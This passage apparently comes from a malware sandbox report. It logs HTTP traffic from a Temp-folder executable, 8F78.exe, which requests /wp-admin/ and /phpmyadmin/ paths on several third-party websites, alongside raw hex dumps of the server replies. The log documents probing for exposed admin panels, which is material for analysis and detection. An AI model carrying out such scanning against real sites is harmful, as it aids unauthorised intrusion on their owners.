                                                                                                                                                                                                                                                                                                                                Data Raw: 36 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 56 7b 6f db 36 10 ff 7f 9f 82 f5 b0 61 6d 2d 5b 4e 93 34 95 e3 00 4e 93 b4 79 37 69 fa c8 8a a0 a0 a4 93 c4 9a 22 35 92 f2 23 9e 80 7d 8d 7d bd 7d 92 1d 25 d9 b1 13 7b c0 12 c0 92 78 ef bb df dd 71 f7 d9 c1 e5 db 9b db 0f 87 24 31 29 df db b5 bf 84 53 11 f7 1a 20 1a 84 84 d4 50 87 86 3e 97 c1 60 00 93 de f9 d1 68 74 70 75 7b 72 2a 7f 3f 4e 86 c1 45 ff ea 70 7f ff aa 7f f0 71 d4 1f 7d ec 9f ec f7 2f c4 84 7f 19 6d 0c cf 6e 37 93 4f e2 cd c8 dd be bf 3a f5 93 d3 fd 68 f8 e3 e8 d3 5b 1d 1e 71 7f fb 26 bc 4a c6 fe 9b eb af 5f be e6 c7 9b e6 55 27 78 29 77 a2 db cb 61 5b ef fc d1 39 7b f7 21 a6 af 0e 0e 3b 67 6d f3 fe d3 e6 d9 e1 c5 f9 db fe e8 b0 df bf ea f5 be 5f 8f c3 ec fd ab f3 cf ac ad d4 79 4a 77 c6 db d1 e5 c9 8f e0 5d e0 9f de 83 bf 75 b0 7f 74 a2 ee cf 0e de 9a 2f b7 5f b3 eb ad f4 f3 cd e5 b9 ba 38 19 6f bd bc 0a e5 7e 1a ef 24 f9 d7 ab be 3a 7e 4f df 5f 6e be 1c 5c 5c 1f 9c 6e 4d fa bd 1e 86 0e 34 dc db 4d c1 50 12 24 54 69 30 bd 46 6e 22 67 a7 b1 b7 6b 98 e1 b0 67 74 6e 64 9a b7 02 99 fe 2a 7c 9d 75 9d ea 71 93 30 4d 46 e0 6b 66 80 e0 6b 24 15 d1 94 c3 b3 25 ae 5a 9a 5c 83 96 b9 0a 40 13 2a 42 72 2c 90 3b a5 86 49 d1 da 6d 57 76 2a 27 04 4d a1 d7 18 32 18 65 52 99 06 09 a4 30 20 d0 a9 11 0b 4d d2 0b 61 c8 02 70 ca 8f 26 13 cc 30 ca 1d 1d a0 d9 5e a7 e5 36 53 3a 66 69 9e 2e 9c e4 1a 54 f9 49 7d 3c 71 1b 4b 66 42 d0 81 62 99 75 63 c1 d2 da c0 c8 42 2a 2c 61 82 11 91 88 29 6d ca a0 7c c0 97 2a ca 52 86 72 4e 64 44 4c 82 5a 1e e2 b5 52 ff fc f5 b7 02 c2 a5 1c 30 11 5b de 16 39 52 a8 33 06 01 8a 72 62 64 c6 02 8d 0f 92 4a 64 44 25 a3 84 1a 2b 49 46 32 e7 21 81 71 06 81 b1 0c 11 43 cb 09 28 68 2e 79 97 50 4d 98 b1 2e b4 c8 17 20 89 cc a0 14 2f d9 e7 ca 28 2a d7 40 55 90 d4 7e 3c c3 fc 70 26 06 3f 91 fa 4f 01 ef 35 18 a6 a6 31 3f 32 93 0c 53 c7 52 1a 43 3b
                                                                                                                                                                                                                                                                                                                                Data Ascii: 66EV{o6am-[N4Ny7i"5#}}}%{xq$1)S P>`htpu{r*?NEpq}/mn7O:h[q&J_U'x)wa[9{!;gm_yJw]ut/_8o~$:~O_n\\nM4MP$Ti0Fn"gkgtnd*|uq0MFkfk$%Z\@*Br,;ImWv*'M2eR0 Map&0^6S:fi.TI}<qKfBbucB*,a)m|*RrNdDLZR0[9R3rbdJdD%+IF2!qC(h.yPM. /(*@U~<p&?O51?2SRC;
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.996656895 CET1286INData Raw: 13 f1 03 21 51 10 f5 1a ed 36 4b e3 96 86 50 66 54 d9 f8 ac 3f 6d 03 69 c6 a9 01 dd e6 32 96 ba 6d e9 df ed 6b ab 54 d1 de db d5 66 82 20 98 2b 6b bf 78 46 84 cd 19 67 f7 d0 0a b4 26 c3 d7 2d b7 e5 92 3f c9 f9 f1 0d 39 43 14 08 0d f8 15 33 93 e4
                                                                                                                                                                                                                                                                                                                                Data Ascii: !Q6KPfT?mi2mkTf +kxFg&-?9C3~iD@ 9emSXluT;#Hq_jjp2M*MYHJiULc&^9S3nronRZ9V72sn6.5{5<]9
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.997026920 CET1286INData Raw: 13 38 52 3b 17 30 e8 4c f1 d7 ad 4c e3 53 76 22 e7 ba 9b 6f 75 af 3f eb 1e 1a 87 7b df 9d bb 04 00 e1 5f d2 ec f2 ab 84 91 e2 d2 2d 83 71 b5 bf 18 7e b2 7b d5 5c fe 2d 28 d9 43 9b 94 3e d1 6b 33 9c 6c 8b 37 9a af 45 ce 82 ee 4a b5 5c 7a c9 8b b7
                                                                                                                                                                                                                                                                                                                                Data Ascii: 8R;0LLSv"ou?{_-q~{\-(C>k3l7EJ\z[*@762T|}0a>ZK={`j<q?FS*es]kYY=47vt|$'/S|I0_Kp-V^YT6Trt(O5Fs/
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.997173071 CET1286INData Raw: 86 22 a4 2f df 99 68 3a 89 b4 1c 1a 24 1b 72 b4 66 ff b9 05 60 df 35 fc ef f4 38 52 cc 0a 00 dd b5 73 41 93 4c e0 c8 21 89 cf 70 e4 98 34 22 76 24 31 31 06 f7 dc 1f 6d d5 18 05 55 5e dc 38 4b 13 6b b3 f4 a5 16 e1 2e a3 d2 a8 e0 d8 6d 9b 3e f3 fb
                                                                                                                                                                                                                                                                                                                                Data Ascii: "/h:$rf`58RsAL!p4"v$11mU^8Kk.m>(4{6-?(89u#Pr>=86[SLtrCy22b-|+se+sfD7F/i%MR|-4Zo`5>w`<5f)J
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.997253895 CET1286INData Raw: 68 0c 65 b1 a2 95 24 5d 10 ab 65 a3 a8 81 1c ab 0a b2 2e 8b 7a b5 52 94 75 e3 c4 58 d4 51 bf a2 22 8f 41 00 a0 03 34 96 2e 50 73 9a 4e a4 a9 d3 06 c2 72 b9 3c 63 8c 04 0f 3f 7c f2 59 b5 2b 23 7c f5 77 c6 9c 7d 9f d3 0d 47 24 f2 99 13 0c 65 0b 28
                                                                                                                                                                                                                                                                                                                                Data Ascii: he$]e.zRuXQ"A4.PsNr<c?|Y+#|w}G$e("{on2=6G<y'tu0HG0BPgW';k5 9_]RAEebmtu9`Xwmx.7"14?
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.997474909 CET1286INData Raw: a9 c3 39 8f 41 32 09 c3 3c e7 71 4e cf 5a 89 5f 0e 66 d6 94 05 f3 68 68 f2 0b 69 f7 60 98 c7 f5 bb 4f 86 f6 59 0c 30 aa 8a 5f ad 52 09 6c 25 a9 19 8b 7c f0 49 40 82 c0 a1 46 eb 77 65 19 d3 2a 56 44 51 b0 b8 02 c0 6b 7f 03 18 75 96 a5 b9 58 2f 49
                                                                                                                                                                                                                                                                                                                                Data Ascii: 9A2<qNZ_fhhi`OY0_Rl%|I@Fwe*VDQkuX/I8U nkHWx<zjrtAUe ?Fx>`a^!(nU[o<<=di\~gG(| `f-Vz"+zv1Zs5kS&ac0!Ik[
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.997529984 CET219INData Raw: d4 65 7e ae 60 d5 63 a6 ed e1 ce 9d 48 33 7c a9 7a e2 40 b4 05 df 08 6e 57 53 b3 62 c5 aa e9 2f 3d a5 2b 9e cc 37 66 8d 49 0d fb f7 8b d7 7f b8 19 31 12 2d ee cd 06 4d b0 93 f3 04 0a 10 df e3 b3 37 c8 14 67 01 a5 b5 5d f2 91 bf 5c c7 b1 55 b4 db
                                                                                                                                                                                                                                                                                                                                Data Ascii: e~`cH3|z@nWSb/=+7fI1-M7g]\U#t /[70(1LL;%t#;E]D5F^p>jks[0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.997895002 CET212OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: tsutomu.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://tsutomu.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.275526047 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:31 GMT
                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                x-powered-by: PHP/8.1.17
                                                                                                                                                                                                                                                                                                                                expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_jkoSlK0dasRxZjyX/fLeTuQNrEmlNnVp1lmP8iVflvrWLQ1wGfaNaYD0IyJzKlhH69Bsf/f7UfZAagQIZDYNnA==
                                                                                                                                                                                                                                                                                                                                last-modified: Thu, 21 Dec 2023 04:03:31 GMT
                                                                                                                                                                                                                                                                                                                                x-cache-miss-from: parking-56c7b4c6cb-h4kfj
                                                                                                                                                                                                                                                                                                                                server: NginX
                                                                                                                                                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                                                                                                                                                Data Raw: 34 43 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 56 dd 52 db 38 14 be df a7 10 d9 e9 ce b6 6b c7 4e 4b 81 3a 84 99 50 a0 a5 a4 69 d3 42 29 74 98 8e 6c 1f db 22 b2 e4 95 64 3b 69 d6 33 fb 1a fb 7a fb 24 7b e4 84 34 f4 e7 62 b9 c0 92 ce ff 77 be 73 60 7f eb e8 cd f3 f3 ab b7 c7 24 33 39 3f d8 b7 bf 09 a7 22 1d 74 40 74 08 89 a9 a1 2e 8d 43 2e a3 e9 14 e6 83 d7 27 75 7d 34 b9 7a 75 26 af 4f b3 2a 1a 0f 27 c7 87 87 93 e1 d1 fb 7a 58 bf 1f be 3a 1c 8e c5 9c 5f d6 8f ab d1 d5 76 76 21 9e d5 fe ce 97 c9 59 98 9d 1d 26 d5 ed c9 c5 73 1d 9f f0 70 e7 3c 9e 64 b3 f0 d9 bb 8f 97 1f cb d3 6d f3 a4 17 fd 21 f7 92 ab 37 95 a7 f7 fe ec 8d 5e bc 4d e9 93 a3 e3 de c8 33 2f 2f b6 47 c7 e3 d7 cf 87 f5 f1 70 38 19 0c 3e df 4e e5 7b 7e e6 c7 54 bf 9b 5d df ce 3f 7a c9 08 ce cb c9 58 1d e7 7c 2c 3e 14 3d 9e bf dd 63 1f 12 5e a9 cb d1 a4 57 bf 48 e8 98 5e 1d f9 a7 f3 57 5f ce 78 f6 72 e7 d9 a1 4e bc 64 f7 22 b9 1e d2 74 72 7a 7d 74 35 16 c3 c1 00 4b 07 1a 1f ec e7 60 28 89 32 aa 34 98 41 a7 34 89 bb d7 39 d8 37 cc 70 38 30 ba 34 32 2f bb 91 cc 7f 13 a1 2e fa ee f2 73 9e 31 4d 6a 08 35 33 40 f0 98 48 45 34 e5 b0 75 4f 6b 65 4d de 81 96 a5 8a 40 13 2a 62 72 2a 50 3b a7 86 49 d1 dd f7 96 71 96 49 08 9a c3 a0 53 31 a8 0b a9 4c 87 44 52 18 10 98 54 cd 62 93 0d 62 a8 58 04 6e 7b 71 98 60 86 51 ee ea 08 c3 0e 7a 5d df c9 e9 8c e5 65 be f1 52 6a 50 ed 95 86 f8 e2 77 ee 85 89 41 47 8a 15 36 8d 8d 48 3f 2d 8c 6c 40 61 05 73 ac 88 24 4c 69 d3 16 15 02 1e 96 55 b6 36 94 73 22 13 62 32 f4 f2 b5 5e 6b f5 ef df ff 28 20 5c ca 29 13 a9 d5 ed 92 13 85 3e 53 10 a0 28 27 46 16 2c d2 f8 21 b9 44 45 74 52 67 d4 58 4b 52 cb 92 c7 04 66 05 44 c6 2a 24 0c 23 67 a0 c0 b9 97 5d 46 35 61 c6 a6 d0 25 97 40 32 59 40 6b de aa af 9d 51 74 ae 81 aa 28 5b e5 b1 85 f8 70 26 a6 bf 90 d5 8f 02 3e e8 30 84 a6 b3 7e 32 f3 02 a1 63 39 4d c1 2b 44 fa 55 90 29 48 06 1d
                                                                                                                                                                                                                                                                                                                                Data Ascii: 4C0VR8kNK:PiB)tl"d;i3z${4bws`$39?"t@t.C.'u}4zu&O*'zX:_vv!Y&sp<dm!7^M3//Gp8>N{~T]?zX|,>=c^WH^W_xrNd"trz}t5K`(24A497p8042/.s1Mj53@HE4uOkeM@*br*P;IqIS1LDRTbbXn{q`Qz]eRjPwAG6H?-l@as$LiU6s"b2^k( \)>S('F,!DEtRgXKRfD*$#g]F5a%@2Y@kQt([p&>0~2c9M+DU)H
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.275727987 CET1286INData Raw: cf 63 79 da d5 10 cb 82 2a 5b 9f cd c7 33 90 17 9c 1a d0 1e 97 a9 d4 9e 95 7f b6 c7 6e eb c2 3b d8 d7 66 8e 24 58 3b f3 1e 6d 11 61 31 e3 ec 0b 74 23 ad 49 b5 db f5 bb 3e f9 8b bc 3e 3d 27 23 64 81 d0 80 b7 94 99 ac 0c db 20 02 22 c9 a9 f6 ee db
                                                                                                                                                                                                                                                                                                                                Data Ascii: cy*[3n;f$X;ma1t#I>>='#d "=x/,p3`if^503FMR]lKPENUD7Tqpf18c?V>a1<hwJu<MtXbwsuCm5Zrf]#.>W}YJis
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.276150942 CET1286INData Raw: 1a d4 d6 f3 7c 0f 70 f7 b3 6e c1 19 71 6f 83 79 48 00 10 fe 0d 47 d7 bf 4b 18 29 ae f3 32 68 a0 f7 8b 61 47 7b 54 cd e5 b7 94 a0 1c da 24 fc 4a ba 7e 38 49 d2 0b 89 43 91 b3 a0 bb 1a 5a 2e b5 e4 f9 09 fd 98 61 2b e2 12 d1 41 85 85 ad 3c 10 e4 cc
                                                                                                                                                                                                                                                                                                                                Data Ascii: |pnqoyHGK)2haG{T$J~8ICZ.a+A<\`$IFB3,=X>|K&t<A[TX?YQ*!es]+Y*CB2.=-}~=O.?K>}7L^Y6#tpC6YmG0@4#}w1
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.276319981 CET1286INData Raw: 5a f6 75 52 0e 39 5a ee 7f 6e 02 d8 f6 19 fe 3a 3e 8c 15 b3 02 40 77 6d 5d d0 64 03 38 b0 4b e2 33 1c d8 67 1c 11 3b 90 99 18 83 3b ee 8f 72 35 16 83 aa 2a 6e 5c e6 49 b5 59 f1 52 8b 48 97 52 69 f1 c1 b1 5d b7 b8 e7 77 71 64 1b 7d 09 86 71 6d 19
                                                                                                                                                                                                                                                                                                                                Data Ascii: ZuR9Zn:>@wm]d8K3g;;r5*n\IYRHRi]wqd}qmhX_J_#@i8@dC8w85E![Le;1=2ci'F(q>Du.*-JW?SNvf[Eto$14<6TD>S<pVs`M\{6:fC@cu
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.276704073 CET1286INData Raw: 6f 09 0d 51 92 9a bc 38 aa 1b 0d 53 37 9b 6d b3 de e2 9a 96 20 1e 19 8b 0e ea 57 54 e4 29 08 00 74 80 c6 7a 1b 35 a7 e9 25 9a ba 68 20 2c 97 cb 13 ca 48 08 f0 c3 a7 90 56 bb 22 c2 57 7f a7 cc d9 f7 59 bc e0 88 44 b6 b4 83 81 b6 00 5a 90 20 3d f8
                                                                                                                                                                                                                                                                                                                                Data Ascii: oQ8S7m WT)tz5%h ,HV"WYDZ ='!c8c'$.tJQ<y#cV1,~iudq>uc%q~F/-gUEOA%4ij68p-}CNR `G#nf


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                132192.168.2.45570493.184.77.21805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.739850044 CET172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: nakupusa.cz
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.991764069 CET374INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Content-Length: 182
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 31 0f 82 30 14 84 f7 fe 8a 27 bb 3c 34 8c 4d 07 05 22 09 22 31 65 70 c4 b4 a6 24 d0 56 28 1a fe bd 05 16 c7 7b 77 df dd a3 bb e4 76 e6 8f 2a 85 0b bf 16 50 d5 a7 22 3f 43 b0 47 cc 53 9e 21 26 3c d9 9c 63 18 21 a6 65 c0 08 55 ae ef 18 55 b2 11 5e b8 d6 75 92 c5 51 0c a5 71 90 99 49 0b 8a db 91 50 5c 43 f4 69 c4 bc 70 07 f6 97 f1 8a 50 cb b8 92 30 c8 f7 24 47 27 05 d4 f7 02 d0 2a db cf 8d e8 5b 8d f0 6d 46 d0 1e 7a 2d 10 18 0d 4e b5 23 8c 72 f8 c8 21 a4 68 97 91 b5 de 17 2e 6f 91 1f 9e f8 51 3a d1 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: M10'<4M""1ep$V({wv*P"?CGS!&<c!eUU^uQqIP\CipP0$G'*[mFz-N#r!h.oQ:


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                133192.168.2.45578068.233.46.109805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.764496088 CET176OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: brightright.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.929795980 CET460INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                134192.168.2.45571193.184.77.21805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.764499903 CET172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: nakupusa.cz
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.047646999 CET374INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Content-Length: 182
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 31 0f 82 30 14 84 f7 fe 8a 27 bb 3c 34 8c 4d 07 05 22 09 22 31 65 70 c4 b4 a6 24 d0 56 28 1a fe bd 05 16 c7 7b 77 df dd a3 bb e4 76 e6 8f 2a 85 0b bf 16 50 d5 a7 22 3f 43 b0 47 cc 53 9e 21 26 3c d9 9c 63 18 21 a6 65 c0 08 55 ae ef 18 55 b2 11 5e b8 d6 75 92 c5 51 0c a5 71 90 99 49 0b 8a db 91 50 5c 43 f4 69 c4 bc 70 07 f6 97 f1 8a 50 cb b8 92 30 c8 f7 24 47 27 05 d4 f7 02 d0 2a db cf 8d e8 5b 8d f0 6d 46 d0 1e 7a 2d 10 18 0d 4e b5 23 8c 72 f8 c8 21 a4 68 97 91 b5 de 17 2e 6f 91 1f 9e f8 51 3a d1 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: M10'<4M""1ep$V({wv*P"?CGS!&<c!eUU^uQqIP\CipP0$G'*[mFz-N#r!h.oQ:


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                135192.168.2.455775141.98.102.194805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.822499990 CET178OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: eshopy-katalog.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.092592955 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4
                                                                                                                                                                                                                                                                                                                                retry-after: 591
                                                                                                                                                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                                                                                                                                                Data Raw: 34 43 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bd 57 59 6f e3 36 10 7e cf af 98 75 60 38 46 25 5b a2 2c 5f 91 8d 6e 77 b7 68 1e 8a 16 9b ec 43 5b f4 81 92 28 9b 0d 25 aa 14 1d c7 5b ec 7f ef 50 92 2f c5 49 10 a3 28 6d 1d e4 0c 3f 0e e7 e2 28 78 17 cb 48 6f 72 06 4b 9d 8a f9 45 60 1e 20 68 b6 98 b5 58 d6 9a 5f e0 08 a3 f1 fc 02 b0 05 29 d3 14 a2 25 55 05 d3 b3 d6 4a 27 f6 b8 75 48 ca 68 ca 66 ad 07 ce d6 b9 54 ba 05 91 cc 34 cb 90 75 cd 63 bd 9c c5 ec 81 47 cc 2e 3b 16 f0 8c 6b 4e 85 5d 44 54 b0 99 6b 41 b1 54 3c bb b7 b5 b4 13 ae 67 99 3c 01 ad 64 28 75 71 00 9c 49 9e c5 ec d1 82 4c 26 52 08 b9 36 6f 54 45 4b fe c0 b6 f3 35 d7 82 cd 3f 29 25 15 0c 1c 2f e8 57 03 15 b1 d0 9b ed bb 69 66 fb d6 ae 17 ca 78 03 ff ec ba 25 03 e3 8b a5 9e 82 eb 38 ed eb 23 4a b9 ad 53 84 94 aa 05 cf a6 e0 1c 0f e7 34 8e 79 b6 38 1a ff b6 7b 7b 49 86 04 77 6f 27 34 e5 62 33 05 9b e6 b9 60 76 b1 29 34 4b 2d f8 41 a0 0e 7f a6 d1 6d d9 ff 11 39 2d 68 dd b2 85 64 f0 e5 a6 65 c1 67 a3 41 69 c1 4f 4c 3c 30 cd 23 6a c1 7b 85 66 40 f5 d3 ac b0 0b a6 78 82 33 de 1b 50 f8 20 05 ea ec 53 2a ff e2 ad 03 98 13 23 b7 9b 34 94 a2 75 bc c3 90 46 f7 0b 25 57 59 6c 47 06 69 0a cb 42 d0 2b c7 02 a7 6d 95 8a c2 7b f7 d9 39 3c a5 0b 36 05 45 63 e3 26 0b f3 44 9b 5f 51 0d ae d7 86 c9 04 67 97 78 c4 1f 1f 23 82 93 a3 47 68 85 1b ca a9 c2 39 e0 3b ed ae 75 0a 69 44 10 69 b8 45 f2 c8 d9 40 e3 51 1b 86 de 16 c8 25 e7 23 0d 26 6d f0 fd 3d d2 f0 6c 24 df 6d 83 3b d8 a9 c9 39 5f 26 a3 f0 9d 48 64 70 3e 90 87 6a 22 a3 bd be bd 2d ca c0 7d 2b 94 8b bb f3 76 a6 23 c4 b7 60 64 0c 40 c8 5b 91 c6 7e 1b 06 e3 ff 44 a8 f1 a0 6d f6 f8 36 a1 1a 79 41 16 98 18 25 26 0c c5 04 d5 98 c8 5e cc 0f 4b b7 91 1d ec 35 0b ef b9 b6 0f a3 4f f0 7c 0a 9a 3d ea eb 93 ac 86 82 49 57 88 6d 9c 1e 48 f8 7c 48 3f 03 7a 16 58 1d eb 98 bc 18 55 7b 8d a2 e3 f9 31 5b 58 70 19 7b 8e 33 46 bf bb 74 12 32 18 7a 4d 9d 55 b9 14 cf 0e 14 c9 e9 f9 2c 7d 51 67 97 e6 fc a0 b8 96 6a e8 ae ce e1 9e 73 08 60 da 2e 87 03 5d 69 d9 d8 86 7c b4 8b 25 8d e5 1a 4d b6 08 4d 42 42 b3 ef 6f 4e af 32 3c b8 f5 65 de 79 86 67 a8 55 f1 fb 98 11 cd 35 f1 0c 33 f1 2b 6e bf 9c e2 98 bb 4d 4a bf 29 99 4d f6 ac fe 3d af 62 f4 cc 6d 58 f2 99 d7 e7 74 3c 85 cb 24 49 4e 3b 40 28 55 cc 94 6d d4 be 2a a6 e0 37 51 ec 54 7e 7d 95 e9 35 fa de b1 69 58 48 b1 d2 ec 98 5e 1a cf 6f 9e 9e 82 25 fa c4 70 e9 54 89 54 69 ed 5f 18 29 ec ca f6 4d d4 da 4f 63 aa f4 49 2a f8 02 17 8f d0 b1 98 7a d1 3f be 4f 19 46 36 c8 4c 6c a0 88 14 63 19 d0 2c 86 ab 94 3e da b5 8b 0c 8c 61 ba 0d f7 79 d6 af 4c ab 27 8e 9d f6 11 e9 db 59 82 f0 6c 2f 88 6b 04 69 